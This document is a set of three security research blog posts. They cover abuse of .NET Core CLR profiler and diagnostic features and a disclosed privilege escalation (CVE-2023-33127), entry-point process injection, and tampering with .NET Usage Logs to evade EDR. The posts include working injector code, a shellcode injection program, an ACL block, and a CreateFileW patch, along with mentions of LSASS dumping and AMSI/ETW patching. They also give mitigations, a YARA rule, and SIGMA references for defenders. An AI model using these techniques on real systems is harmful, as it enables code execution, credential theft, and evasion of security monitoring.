
Abusing .NET Core CLR Diagnostic Features (+ CVE-2023-33127)

Introduction

Background

.NET is an ecosystem of frameworks, runtimes, and languages for building and running a wide range of applications on a variety of platforms and devices. The .NET Framework was initially released in the early 2000s as Microsoft’s implementation of the Common Language Infrastructure (CLI) specification. In 2016, Microsoft released .NET Core, the first truly open-source, cross platform version of the .NET Platform.

All flavors of .NET rely on a runtime component called the Common Language Runtime (CLR). The CLR is responsible for executing managed programs (e.g. assemblies) and handling other tasks such as memory management, garbage collection, and just-in-time (JIT) compilation of managed-to-unmanaged code. In open-source .NET, the CLR is implemented as the Core CLR (e.g. coreclr.dll).

Although the .NET Framework will be referenced frequently, this blog will focus on abusing several runtime diagnostic features that are mostly specific to open-source .NET on modern Microsoft Windows client operating systems (e.g. .NET, formerly called .NET Core, since version 5).

Of note, the content provided in this blog was first presented in my MCTTP 2023 Conference talk – Dotnet: Not Dead…Yet. Defensive considerations, SIGMA rules, and mitigation guidance are located at the end of the post.

.NET Native Inclusion

Although it may be a surprise to a few, .NET Framework (4.8.x) is still the default “system wide” .NET implementation on Microsoft Windows. However, Windows ships with several Universal Windows Platform (UWP) applications (“apps”) that rely on .NET Native, a .NET pre-compilation technology that contains an instance of the Core CLR runtime. An example UWP app that leverages .NET Native is the Phone Link app (PhoneExperienceHost.exe).

Note: Visual Studio components and Azure DevOps Pipeline Agents leverage the open-source .NET runtime. Most recently, .NET version 8 was released.

Runtime Configuration & Diagnostics

Over the last few years, I’ve blogged about several ways to abuse the .NET Framework by leveraging CLR Configuration Knobs. Adjusting knobs allows control over the behavior of the .NET Common Language Runtime (CLR) for development, debugging, and diagnostic purposes. The Core CLR is no exception and includes many similar and unique knobs that can be configured in the registry, environment variables, and configuration files.

A very interesting and well supported diagnostic extension for the .NET Framework CLR is the profiling API. As stated by Microsoft, a profiler is a “tool that monitors the execution of another application. [It] is a dynamic link library (DLL) that consists of functions that receive messages from, and send messages to, the CLR by using the profiling API. The profiler DLL is loaded by the CLR at run time.” Messaging between the profiler DLL and the CLR is implemented through the ICorProfilerCallback/2 interface for event notification and the ICorProfilerInfo/2 interface for profiled application state information. Profiling a .NET application could reveal event(ing) information such as assembly loading, module loading, and thread creation (Source: Microsoft Docs).

Interestingly, open-source .NET includes a rich set of troubleshooting diagnostic features, tools, and APIs that can be leveraged to interface with the Core CLR without the need of a profiler, though profiling is also supported (which we’ll dive into shortly). Of note, Microsoft documentation for Core runtime diagnostics is very robust and well worth reviewing.

CLR Profiler Abuse

.NET Framework CLR Profiler Loading

At .NET application start, configuration knobs adjust the CLR/runtime behavior. As documented by Casey Smith (@subTee) in 2017, the following .NET Framework profiler knobs are configured as environment variables to load an unmanaged “profiler” DLL:

  • COR_ENABLE_PROFILING – Set to 1 to enable profiler loading
  • COR_PROFILER – Set a target CLSID or arbitrary GUID value (Note: Not necessarily required for the .NET Framework)
  • COR_PROFILER_PATH – Set path to the profiler DLL

If an arbitrary DLL is loaded into the CLR that does not meet the requirements and structure for a profiler DLL, the CLR will effectively unload the library. Depending on the offensive use case, this may or may not be important. Additionally, this technique is documented in Mitre ATT&CK as sub-technique: T1574.012.

.NET Core CLR Profiler Loading

The Core CLR profiler in open-source .NET acts in a similar way but leverages the following knobs to load a “profiler” DLL:

  • CORECLR_ENABLE_PROFILING – Set to 1 to enable profiler loading
  • CORECLR_PROFILER – Set an arbitrary GUID value (Note: Required for open-source .NET)
  • CORECLR_PROFILER_PATH – Set path to the profiler DLL (Note: knob names may also be CORECLR_PROFILER_PATH_32 or CORECLR_PROFILER_PATH_64 depending on architecture)

When set as environment variables in the registry, the .NET application Core CLR loads the DLL for execution and persistence:

.NET Core CLR Diagnostics

CLR Diagnostic Port

As mentioned previously, .NET Core CLR diagnostic analysis can be performed without the use of a CLR profiler. By default, the Core CLR enables an Interprocess Communication (IPC) diagnostic endpoint called a diagnostic port. On Linux and macOS, the IPC occurs over Unix domain sockets by default. On Windows, IPC occurs over a named pipe, which follows this naming convention:

\\.\pipe\dotnet-diagnostic-{Process ID (PID) of .NET application}

Diagnostic applications interface and communicate with a target application’s CLR diagnostic port to send commands and receive responses. Graciously, Microsoft has released a suite of diagnostic tools and an API for interfacing with the diagnostic port.

Diagnostic Applications & Tools

The following Microsoft signed command line applications are available to diagnose .NET application issues:

  • dotnet-counters
  • dotnet-dump
  • dotnet-monitor
  • dotnet-trace
  • …and more

As you can imagine, some of these utilities can be used for living-off-the-land/lolbin scenarios. For instance, dotnet-dump instructs the CLR of a target .NET application to dump its process memory. Dotnet-dump also implements MiniDumpWriteDump, which can be used to create process minidumps of non-.NET processes (e.g. LSASS):

Diagnostic API

Although command-line diagnostic tools provide a turnkey approach for diagnosing .NET applications, Microsoft makes available the Microsoft.Diagnostics.NETCore.Client API to interact with the diagnostic port of .NET applications for deeper use cases. The API is relatively straightforward to use and includes a diagnostic class and several methods for:

  • Setting environment variables
  • Dumping the .NET process
  • Setting a startup CLR profiler
  • Attaching a CLR profiler…

Interestingly, a “monitoring” application can leverage the API and the diagnostic port to instruct the target application CLR to attach a profiler. The following C# code snippet serves as an “injector” to load a “profiler” DLL into a running process using the AttachProfiler() method:

using System;
using Microsoft.Diagnostics.NETCore.Client;

class profiler_injector
{
    static void Main(string[] args)
    {
        int pid = Int32.Parse(args[0]);
        string profilerPath = args[1];

        AttachProfiler(pid, Guid.NewGuid(), profilerPath);
    }

    static void AttachProfiler(int processId, Guid profilerGuid, string profilerPath)
    {
        var client = new DiagnosticsClient(processId);
        client.AttachProfiler(TimeSpan.FromSeconds(10), profilerGuid, profilerPath);
    }
}

Expectedly, running the injector program shows a successful result:

IPC Messaging Protocol

The Diagnostic IPC Protocol is used for client (“monitoring application”) and server (target application CLR) messaging over the diagnostic port named pipe. Microsoft provides excellent documentation of the transport, structure, and commands. Leveraging the IO Ninja protocol analyzer, an example client request and server response for issuing the AttachProfiler command appears as follows:

The “magic” string value effectively serves as the message header, and it has a 14-byte reservation. As of this blog release date, the constant magic value is “DOTNET_IPC_V1”. The following two bytes are reserved for the payload size, and the next two bytes are reserved for the command code.

For the client message, 0x0301 is the identifier for the AttachProfiler command. The next two bytes are generally reserved, and the remainder of the message is the payload. In this case, the client payload data includes the attachment timeout value, a CLSID/GUID value (e.g. for the CORECLR_PROFILER), and the path to the profiler DLL (e.g. for CORECLR_PROFILER_PATH). The remaining bytes are not set, but other messages may contain a client data element.

For this example, the command code in the server response (0xFFFF) is interesting. Although the “profiler” DLL successfully attaches, the command code indicates an error with the DLL since it is not a true profiler DLL. In this case, the DLL does not adhere to the expected structure and is evicted.

Note: With insight into the messaging protocol, one could go a step further and forgo managed API usage and craft diagnostic IPC messages at the byte-code level.

CVE-2023-33127: .NET Cross Session Local Privilege Escalation

Motivation

Every now and again, researching offensive tradecraft opens the door for thinking of new ways to exploit potential vulnerabilities. The CLR diagnostic attack surface was interesting, especially with the capabilities provided by the CLR and the use of named pipes as the IPC endpoint. Initially, I did not identify any formal services operating in a privileged context (e.g. NT AUTHORITY\SYSTEM) that leveraged .NET Core. Eventually, I found a few third-party services as well as use within Azure pipelines, but the UWP apps were all I had to work with at the time. I noted two possible use cases for privilege elevation:

  • An observation was made that some UWP apps operated in low integrity. There may be a scenario to potentially elevate from low to medium integrity within a user session.
  • Other UWP apps operate at medium integrity. UWP processes are created for each user logged into a machine. It may be possible to influence the UWP application diagnostic port that is created in another user’s session.

I opted to start with the latter as I always found cross-session attacks to be very interesting.

Discovery Methodology

Having already spent too many unhealthy years looking at the Component Object Model (COM) and following the incredible research of James Forshaw (@tiraniddo), it was the most natural place to look for cross-session attack opportunities. It is no secret that users can activate DCOM objects in other interactive sessions. This includes a scenario where a non-privileged user is logged into the same machine as a privileged user.

Cross session activation is made possible when the identity of the target DCOM object is set to run as the “interactive user” (e.g. the interactive user in the target session), and the activation and launch permissions permit the object activation to occur by the launching user (e.g. the attacker).

Note: Even if DCOM security settings permit object activation in another session, it does not necessarily mean the launching user has the permissions to access and use the activated object. Regardless, activation is all that is required for this use case.

Fortunately for us, James developed and released OleViewDotNet, which makes discovering and analyzing COM objects much easier and quicker. After narrowing down COM objects configured to run as the “interactive user”, I discovered that the Phone Link UWP application (PhoneExperienceHost.exe) was also a DCOM server:

After some basic testing, two key findings emerged:

  • As an out-of-process DCOM server, associated DCOM class objects would launch the PhoneExperienceHost.exe executable (including all .NET components).
  • A lower privileged user could most certainly activate several associated DCOM objects in a privileged user session on Windows 10 (e.g. CLSID – 7540C300-BE9B-4C0D-A335-F002F9AB73B7).

Although a potential premise was set for cross-session attack, there was still the problem of lacking a core exploitation vector. There are several ways to approach this problem, and I thought about investigating a few of those potential vectors, but I focused on the diagnostic port named pipe. There are interesting exploitation primitives that could potentially be leveraged to attack named pipes as discussed in this fantastic blog post by @0xcsandker.

Albeit an obvious statement – one of the best things about open-source software is that the source code is made publicly available, so there is a time advantage for not having to reverse engineer part of the .NET runtime and/or dive too deeply into the internals (although it is not a bad idea). As such, I decided to search through the .NET runtime source code on GitHub and analyze the diagnostic port implementation. Here is the C code used to create the named pipe with CreateNamedPipeA (prior to patching):

Named pipes are FIFO structures – the first named pipe server instance has precedence to respond to client requests if multiple named pipes with the same name exist. Furthermore, subsequent named pipes inherit the handle security descriptor of the first named pipe when created, including the DACL and ownership. However, if the FILE_FLAG_FIRST_PIPE_INSTANCE flag is specified within the openmode parameter, the subsequent named pipe will not be created, and inheritance will be thwarted.

Interestingly, the FILE_FLAG_FIRST_PIPE_INSTANCE flag is not specified when creating the diagnostic port named pipe. This means that the named pipe will still be created even if another pipe with the same name already exists. In short, if an attacker creates a crafted named pipe before the Core CLR creates a diagnostic port with the same name, the attacker has the ability to control the diagnostic endpoint and issue commands from another session because the attacker owns the named pipe handle and security descriptor. To successfully exploit this condition, the attacker must figure out a way to create the malicious named pipe prior to the .NET application CLR runtime creating the legitimate named pipe of the same name.

Note: In my recorded MCTTP conference talk, I misspoke about the inclusion of the PIPE_UNLIMITED_INSTANCES flag when it should have been about the exclusion of the FILE_FLAG_FIRST_PIPE_INSTANCE flag. Please excuse this error if you decide to watch the recorded talk.

Now, let’s recall the naming convention for the diagnostic port named pipe:

\\.\pipe\dotnet-diagnostic-{Process ID (PID) of .NET application}

Although the named pipe name is mostly static, the suffix mirrors the process identifier of the running .NET application. As a result, there are three challenges to overcome for successful exploitation:

  1. Beat a race condition and create the tampered named pipe before the target .NET application.
  2. Figure out a continuous way to spawn the target process until a named pipe match is made.
  3. And finally, deliver a payload…

Exploitation Walkthrough

Fortunately, all of the challenges can be addressed programmatically with the required conditions in place. The first order of business was to address the race condition, which in many ways is out of our control, so my solution was to optimize coverage and leverage a “spray and pray” technique. For the proof-of-concept, I opted to create thousands of weakly permissive named pipes conforming to the diagnostic port convention. After a restart, newly spawned target application processes were likely to receive low-ordered PIDs, which slightly increased the chance of hitting the sprayed named pipes. In reality, this approach was not as practical as simply accounting for different ranges of PIDs and maintaining a sense of realism (e.g. no reboot in the real world with multiple sessions). In the end, the best option was simply to increase the number of tampered named pipes to get a quicker match.

Next, the issue of continuous COM activation. Interestingly enough, activating a cross-session DCOM object is quite easy through the use of a Session Moniker:

Format: Session:[session id]!clsid:[class id]

I opted to continuously activate the target DCOM object in an infinite loop. A sleep delay was added to ensure that the same, previously activated object was not re-used, so that a new out-of-process server in the target session was spawned to increase the chance of a match.

Lastly, I needed a payload delivery vector. This was the best part – simply re-using the AttachProfiler capability to deliver a malicious DLL payload worked like a charm after cleaning up the malicious named pipe.

Demonstration

Here is a screenshot of the exploit in action:

Once the .NET target process created the diagnostic port named pipe after a match, the handle inherited weak DACL permissions and ownership from the tampered named pipe:

Upon successful tampering, the exploit sends the AttachProfiler command to the target .NET application diagnostic endpoint and instructs the CLR to load the payload DLL to achieve cross-session code execution:

Mitigation & Disclosure Timeline

  • 03/2023 – Initial report submitted to MSRC
  • 04/2023 – Acknowledgement of vulnerability and patch development
  • 06/2023 – Unofficially, Microsoft appeared to address launch and activation permissions for the impacted DCOM objects
  • 07/2023 – Official patch released (in .NET) by Microsoft
  • 09/2023 – Bug initially disclosed at the 2023 MCTTP conference

Defensive Considerations

  • To protect against CVE-2023-33127 cross-session privilege escalation, upgrade .NET dependency components to the latest version. The patch was officially addressed in July 2023.
  • To prevent the .NET Core CLR diagnostic port from loading at all, set persistent environment variables at all applicable levels with the following configuration knob:
DOTNET_EnableDiagnostics=0
  • To detect possible dotnet-dump.exe lolbin abuse, consider implementing the following SIGMA rule authored by Nasreddine Bencherchali (@nas_bench): proc_creation_win_lolbin_dotnet_dump
  • To detect possible Environment Variable CoreCLR profiler abuse, consider implementing the following updated SIGMA rule originally authored by Jose Rodriguez (@Cyb3rPandaH): registry_set_enabling_cor_profiler_env_variables
  • Understanding .NET telemetry sources is important for collecting events and building robust detections. Telemetry Layering by Jonny Johnson (@jsecurity101) is a great resource that dives into the concept. As such, consider leveraging .NET (Core) diagnostic capabilities to aid in telemetry collection if feasible for your use cases. Monitor for interesting and opportunistic CLR events (e.g. profiler attachment) in addition to other interesting events such as .NET assembly loads.

Conclusion

.NET presents an interesting and opportunistic attack surface. In this post, we focused on Windows techniques, but there are certainly use cases that may extend to or present unique opportunities on other platforms and operating systems.

As always, thank you for taking the time to read this post and happy hunting!

-bohops

No Alloc, No Problem: Leveraging Program Entry Points for Process Injection

Introduction

Process Injection is a popular technique used by Red Teams and threat actors for defense evasion, privilege escalation, and other interesting use cases. At the time of this publishing, MITRE ATT&CK includes 12 (remote) process injection sub-techniques. Of course, there are numerous other examples as well as various and sundry derivatives.

Recently, I was researching remote process injection and looking for a few under-the-radar techniques that were either not documented well and/or contained minimalist core requirements for functionality. Although the classic recipe of VirtualAllocEx() -> WriteProcessMemory() -> CreateRemoteThread() is a stable option, there is just way too much scrutiny by EDR products to effectively use such a combination in a minimalist fashion.

In this post, we’ll explore a couple of entry point process injection techniques that do not require explicit memory allocation or direct use of methods that create threads or manipulate thread contexts.

AddressOfEntryPoint Process Injection

Repeat after me: when in doubt, go to Red Team Notes for a solution. This is where I came across this great write-up by @spotheplanet that showcases how to leverage the AddressOfEntryPoint relative virtual address for code injection.

When a Portable Executable (PE) is loaded into memory, the AddressOfEntryPoint is the address of the entry point relative to the image base (Microsoft Learn). In a PE exe file/image, the AddressOfEntryPoint field is located in the Optional Header:


Abusing the AddressOfEntryPoint field is not an entirely new concept. Although not always functional in implementation, the AddressOfEntryPoint field can be stomped and overwritten with shellcode in an arbitrary PE file to load the injected shellcode at program start (as demonstrated here). Interestingly, the technique is also achievable in the context of a remote process.

When a process is created, the first two modules loaded into memory are the program image and ntdll.dll. As such, when a process is created in a suspended state, these are the only two modules loaded:


Essentially, the operating system does just enough bootstrapping to load the bare essentials; however, the AddressOfEntryPoint is not yet called to begin formal program execution. So, you may be asking…how does one find the AddressOfEntryPoint in a suspended process to inject code?

Following the Red Team Notes write-up, the process is summarized as follows:

  • Obtain the target image PEB address and pointer to the image base of the remote process via NtQueryInformationProcess().
  • Obtain the target process image base address as derived from the PEB offset via ReadProcessMemory().
  • Read and capture the target process image headers via ReadProcessMemory().
  • Get a pointer to the AddressOfEntryPoint address within the target process optional header.
  • Overwrite the AddressOfEntryPoint with desired shellcode via WriteProcessMemory().
  • Resume the process (primary thread) from a suspended state via ResumeThread().

Using the sample code provided, our shellcode is successfully injected and executed in the remote process:

Note: For a 64-bit code example of this technique, check out this GitHub project by Tim White.

‘ThreadQuery’ Process Injection

Maybe not as well known as NtQueryInformationProcess(), a similar-in-name method exported from ntdll.dll is NtQueryInformationThread():


While reading the Microsoft documentation for this function, a statement in the ThreadInformationClass parameter section stuck out:

“If this parameter is the ThreadQuerySetWin32StartAddress value of the THREADINFOCLASS enumeration, the function returns the start address of the thread”

Microsoft Docs


Although very interesting, information about the THREADINFOCLASS enum was not readily accessible on the Microsoft site. However, a quick Google search leads us to the ProcessHacker GitHub repo page containing a definition for the enum:


As shown in the previous image, a lot of information can be pulled from THREADINFOCLASS. For our purposes, we are most interested in obtaining a pointer to ThreadQuerySetWin32StartAddress. Recall what we already know about a suspended process: the program entry point has not been called (yet). So, any thread address information obtained from ThreadQuerySetWin32StartAddress when querying the primary process thread is likely the address of the program entry point. Let’s explore this assumption…

First, we must figure out how to actually obtain a handle to the primary process thread. Fortunately, this is quite trivial since we start the process with CreateProcess(). The information is readily available as a pointer to the PROCESS_INFORMATION structure. Conveniently, Microsoft states:

[PROCESS_INFORMATION] contains information about a newly created process and its primary thread. It is used with the CreateProcess, CreateProcessAsUser, CreateProcessWithLogonW, or CreateProcessWithTokenW function.

Microsoft Docs


As such, we use NtQueryInformationThread() to obtain a pointer to the thread start address via ThreadQuerySetWin32StartAddress (which is represented as numerical value 0x09 in the THREADINFOCLASS enum).

Next, we write our shellcode to the address of ThreadQuerySetWin32StartAddress with WriteProcessMemory() and leverage ResumeThread() to resume the thread for launching the shellcode.

Putting it all together, this simple C++ program should accomplish the task (targeting notepad.exe):

#include <stdio.h>
#include <windows.h>
#include <winternl.h>
#pragma comment(lib, "ntdll")

int main()
{
    // Embed our shellcode bytes
    unsigned char shellcode[]{ 0x56,0x48,0x89, ... };

    // Start target process
    STARTUPINFOA si = { sizeof(si) };
    PROCESS_INFORMATION pi = { 0 };
    CreateProcessA(0, (LPSTR)"c:\\windows\\system32\\notepad.exe", 0, 0, 0, CREATE_SUSPENDED, 0, 0, &si, &pi);

    // Get memory address of primary thread
    ULONG64 threadAddr = 0;
    ULONG retlen = 0;
    NtQueryInformationThread(pi.hThread, (THREADINFOCLASS)9, &threadAddr, sizeof(PVOID), &retlen);
    printf("Found primary thread start address: %I64x\n", threadAddr);

    // Overwrite memory address of thread with our shellcode
    WriteProcessMemory(pi.hProcess, (LPVOID)threadAddr, shellcode, sizeof(shellcode), NULL);

    // Resume primary thread to execute shellcode
    ResumeThread(pi.hThread);

    return 0;
}

Once we compile and run the application, it appears everything works as intended.


Before declaring victory, let’s modify our code slightly and analyze the program operation to validate (or debunk) our initial assumption…

ThreadQuerySetWin32StartAddress Analysis

First, we comment out the ResumeThread() call in the program, recompile, and run. This, of course, creates the target (notepad.exe) process in a suspended state. We will resume the process manually when necessary.

In our program output, NtQueryInformationThread() returns a memory address of 0x7ff6a0ff3f40 when querying for ThreadQuerySetWin32StartAddress:

Analyzing the suspended process in ProcessHacker, we see a single thread pointing to a start address of 0x7ffdaf6a2680.


Once we attach the x64dbg debugger to the suspended program, the program state resumes but the single thread remains suspended. The instruction pointer currently points to the start address of the single thread for execution of the ntdll:RtlUserThreadStart() function.


For clarity, the currently suspended thread is not the primary program thread. Furthermore, the call to RtlUserThreadStart() is actually a part of the initial process start-up and initialization routine.

Moving forward, we manually resume the suspended thread to continue through the remainder of the process initialization, and then add a breakpoint in the debugger for the ThreadQuerySetWin32StartAddress returned memory address (0x7ff6a0ff3f40). When we run the application, the breakpoint hits on the resolved program entry point address:


Stepping through the remainder of the program, the shellcode is successfully executed:

*Note: Overwriting the entry point may result in unstable program functionality (e.g. if the shellcode is large).

Defensive Considerations

  • While taking a look at the stack threads, I noticed an interesting method call for _report_securityfailure. This is a feature of VTGuard which “detects an invalid virtual function table which can occur if an exploit is trying to control execution flow via a controlled C++ object in memory”.

    Tracing for such stack events and correlating with System/Application/Security-Mitigations Event Log errors may provide an interesting detection opportunity (Please reach out if you have more information on this!)

  • The following POC Yara rule may be useful for identifying suspicious PE files that leverage methods associated with entry point process injection:
import "pe"

rule Identify_EntryPoint_Process_Injection
{
    meta:
        author = "@bohops"
        description = "Identify suspicious methods in PE files that may be used for entry point process injection"
    strings:
        $a = "CreateProcess"
        $b = "WriteProcessMemory"
        $c = "NtWriteVirtualMemory"
        $d = "ResumeThread"
        $e = "NtQueryInformationThread"
        $f = "NtQueryInformationProcess"

    condition:
        pe.is_pe and $a and ($b or $c) and $d and ($e or $f)
}

Conclusion

As always, thank you for taking the time to read this post.

-bohops

Investigating .NET CLR Usage Log Tampering Techniques For EDR Evasion (Part 2)

Introduction

Last year, I blogged about Investigating .NET CLR Usage Log Tampering Techniques For EDR Evasion. In that part 1 post, we covered:

  • The purpose of .NET Usage Logs and when they are created
  • How Usage Logs are used to detect suspicious activity
  • Several mechanisms for tampering with Usage Logs to avoid log creation and subsequent detection
  • Defensive considerations for potentially detecting nefarious activity around .NET and Usage Log tampering

Recently, I revisited the research topic to close the loop on some outstanding research and figured I would share. In this post, we’ll recap .NET Usage Logs, highlight two other tampering techniques, and review defensive considerations.

A Recap of .NET Usage Logs

When .NET applications are executed or when assemblies are injected into another process memory space (by the Red Team), the .NET Runtime is loaded to facilitate execution of the assembly code and to handle various and sundry .NET management tasks. One task, as initiated by the CLR (clr.dll), is to create a Usage Log file named after the executing process once the assembly has finished executing for the first time in the (user) session context. This log file contains .NET assembly module data and serves as an information file for .NET native image auto-generation (auto-NGEN).

There are several directories dedicated to Usage Log creation depending on the .NET user context, the .NET version, or other caveats such as specialty applications (e.g. Office/Store/etc.). A few examples include:

  • 64-bit .NET 4.0, User-Level: \Users\<user>\AppData\Local\Microsoft\CLR_v4.0\UsageLogs
  • 32-bit .NET 4.0, User-Level: \Users\<user>\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs
  • 64-bit .NET 4.0, System-Level: \Windows\System32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs
  • 32-bit .NET 4.0, System-Level: \Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs

Prior to process exit, the CLR typically writes to one of the aforementioned file paths if a log file does not already exist in the target directory. For instance, we can see that the powershell.exe.log Usage Log is created for the first time just prior to ‘gracefully’ terminating the powershell.exe process:

Monitoring Usage Log file creation events provides detection opportunities for identifying suspicious and/or unlikely processes that have loaded the .NET CLR.

Tampering Technique: Discretionary ACL Block

A low-effort, yet effective way to prevent the Usage Log write operation is by setting an Access Control List (ACL) entry on the target \UsageLogs directory. As an example, let’s target a user context named ‘user’ who runs a 64-bit .NET application.

First, let’s check the existing ACL on the \UsageLogs directory. This can be obtained with the get-acl PowerShell cmdlet:

get-acl c:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ |fl

As expected, ‘user’ has Allow-Full Control permission over the \UsageLogs folder in their respective home directory structure. Let’s use the following slightly modified C# code from Microsoft Docs to set a deny ACL entry on the \UsageLogs directory for ‘user’ using the AddAccessRule() method from the System.Security.AccessControl namespace:

using System;
using System.IO;
using System.Security.AccessControl;

namespace FileSystemExample
{
    class DirectoryExample
    {
        public static void Main()
        {
            try
            {
                Console.WriteLine("Hello World!");

                //Set Deny ACL for "user"
                DirectoryInfo dInfo = new DirectoryInfo(@"C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\");
                DirectorySecurity dSecurity = dInfo.GetAccessControl();
                dSecurity.AddAccessRule(new FileSystemAccessRule(@"WIN-FLARE\user", FileSystemRights.FullControl, AccessControlType.Deny));
                dInfo.SetAccessControl(dSecurity);
            }
            catch (Exception e)
            {
                Console.WriteLine(e);
            }
        }
    }
}

After the application runs, the deny entry is added to the ACL:

Although the Allow-FullControl entry is still present, the Deny-FullControl entry takes precedence and prevents the creation of the Usage Log as well as access to the \UsageLogs directory in this case:

Note: This technique likely requires out-of-band cleanup when finished.
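Since the deny entry survives process exit, that out-of-band cleanup can be performed with the complementary RemoveAccessRule() method. The following is a minimal sketch assuming the same example path and ‘WIN-FLARE\user’ account used above:

```csharp
using System.IO;
using System.Security.AccessControl;

namespace FileSystemExample
{
    class AclCleanup
    {
        public static void Main()
        {
            // Remove the previously added Deny-FullControl entry for "user"
            DirectoryInfo dInfo = new DirectoryInfo(@"C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\");
            DirectorySecurity dSecurity = dInfo.GetAccessControl();
            dSecurity.RemoveAccessRule(new FileSystemAccessRule(@"WIN-FLARE\user", FileSystemRights.FullControl, AccessControlType.Deny));
            dInfo.SetAccessControl(dSecurity);
        }
    }
}
```

RemoveAccessRule() matches on identity, rights, and access type, so the arguments must mirror the original AddAccessRule() call.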

Tampering Technique: Inline Hooking

An interesting technique for dismantling user mode security features is hooking a target function and disrupting program flow in memory. Great examples of this include evading ETW by disrupting the EtwEventWrite() function in Kernel32.dll (thanks @_xpn_) and evading AMSI by patching AmsiScanBuffer() in amsi.dll (thanks @_xpn_ and @_RastaMouse). Similarly, might we be able to use such a technique to tamper with .NET Usage Log creation? If we fire up Procmon and inspect our .NET program trace, we can drill down to see the series of events that occur when the Usage Log is created for first time program execution:

Procmon gives us insight into the operation performed, and not surprisingly, we can see that the CreateFile operation (using CreateFileW()) is used to open the handle to create the target Usage Log file as shown in this partial stack trace:

It would seem that simply patching CreateFileW() in KernelBase.dll may prevent Usage Log creation, so we should just try it, right? Before exploring that possibility, let’s consider a few caveats and tradeoffs:

  • Patch Timeliness: Whereas patching security-enabling functions (e.g. ETW/AMSI) makes sense earlier in program execution flow, patching CreateFileW() early may adversely impact the running program since such calls are made frequently during the process lifetime. As you may recall from the previous post, the call that initiates the Usage Log creation process occurs during process shutdown as initiated by the CLR (which is also noted in the process trace above). As such, patching should occur near process exit.
  • Process Exit: .NET tradecraft varies between Command & Control (C2) frameworks, custom tooling/usage, etc. In many cases, the end of process execution is also the end of executing .NET assembly modules, so patching CreateFileW() near process end would generally work in these cases. However, if assemblies are executed inline, patching CreateFileW() may prove risky for the lifetime of the running process.
  • Patch Function Selection: Patching CreateFileW() may seem like the most obvious choice. However, inline hooking other candidate functions just might achieve the same effect.

Now, let’s assume that we would like to move forward with patching because it meets the use case requirements, so we open our target 64-bit .NET program in the x64dbg debugger to find lead information that may help us craft a suitable (set of) patch instructions. First, we set a breakpoint on CreateFileW() and step through until we find the instruction of interest in the disassembler. In this case, it is a JMP to KernelBase:CreateFileW:

At this point, we see that the RCX register holds a memory address for the first parameter of CreateFileW(), which is the file path pointer for the target Usage Log:

Next, we step into the function and work our way through the instructions. To highlight, we observe several operations within KernelBase:CreateFileW() but no instructions that seem to manipulate RCX. However, we do see a call to the internal KernelBase:CreateFileInternal() function, which was evident in our earlier Procmon stack trace (as seen above).

Interestingly, we finally observe RCX manipulated in the disassembler after stepping into KernelBase:CreateFileInternal():

A quick Google search does not reveal official documentation about KernelBase:CreateFileInternal(). It is not an export of Kernel32 or KernelBase, so it definitely is an internal function. The best information found is a reference in this blog post by James Forshaw. For our use case, however, we are at the point where we may be venturing down the proverbial rabbit hole, so analyzing the heavy lifting subsequently performed by CreateFileInternal(), including the chain of *CreateFile* calls in user and kernel mode, is beyond the scope of this post (but a good exercise nonetheless).

So, let’s get back on track, step out of CreateFileInternal(), and back into CreateFileW(). Here, we observe that we are near the end of our CreateFileW() call as we approach the return (RET) instruction. Conveniently, this appears to be all that we need since it takes us back to the CLR after CreateFileW() is finished:

And after all that, let’s simply patch CreateFileW() with the return op code (0xC3) in the following C# code example:

using System;
using System.Runtime.InteropServices;

namespace MyVeryEvilTestAssembly
{
    class Program
    {
        static void Main(string[] args)
        {
            Console.WriteLine("Hello World");

            //Placed at the end of our program for good measure
            EvadeUsageLogDetections();
        }

        static void EvadeUsageLogDetections()
        {
            byte[] patch = new byte[] { 0xC3 }; //Patch with ret code
            IntPtr kernelBase = LoadLibrary("KernelBase.dll"); //We should be able to use Kernel32.dll as well
            IntPtr createFileAddr = GetProcAddress(kernelBase, "CreateFileW");
            VirtualProtect(createFileAddr, (UIntPtr)patch.Length, 0x40, out uint oldProtect);
            Marshal.Copy(patch, 0, createFileAddr, patch.Length);
            VirtualProtect(createFileAddr, (UIntPtr)patch.Length, oldProtect, out oldProtect);
        }

        [DllImport("kernel32")]
        public static extern IntPtr GetProcAddress(IntPtr hModule, string lpProcName);

        [DllImport("kernel32")]
        public static extern IntPtr LoadLibrary(string lpLibFileName);

        [DllImport("kernel32")]
        public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint pflOldProtect);
    }
}

After analyzing our program once more in the debugger after the program change, we can see the return opcode patch applied, and the CreateFile operation is completely thwarted for Usage Log creation:

And that is just one patch option. There are probably better ways to handle last error(s) 😉

Usage Log Defensive Considerations

Last year, I reported this issue to MSRC, and they concluded that Usage Log evasion was not a security boundary issue. However, the security takeaways in the previous post and this post are relevant:

*Monitor for \UsageLogs directory ACL changes (via Event Log): Ensure the “Audit Object Access” setting is enabled (for success and failure) in the System Audit Policy or that the “Audit File System” setting is enabled in the Advanced Audit Policy Configuration.

Set auditing on the \UsageLogs directories that should be monitored, including the security principal (e.g. Everyone). In Advanced settings, select “Change permissions”, ensure success is checked (at least), and apply.

Monitor for Event ID 4670 to detect DACL changes (per this source). An example event looks like this:
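If log collection is not centralized, the Security log can also be queried for these events programmatically. The following is a hedged C# sketch using the EventLogReader class (requires privileges to read the Security log; the UsageLogs string match is an illustrative filter, not a complete detection):

```csharp
using System;
using System.Diagnostics.Eventing.Reader;

class DaclChangeHunter
{
    static void Main()
    {
        // XPath filter for permission-change (DACL) events in the Security log
        var query = new EventLogQuery("Security", PathType.LogName, "*[System[(EventID=4670)]]");
        using (var reader = new EventLogReader(query))
        {
            for (EventRecord rec = reader.ReadEvent(); rec != null; rec = reader.ReadEvent())
            {
                // Surface only events that touch a UsageLogs directory
                string msg = rec.FormatDescription();
                if (msg != null && msg.Contains("UsageLogs"))
                    Console.WriteLine(rec.TimeCreated + ": " + msg);
            }
        }
    }
}
```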

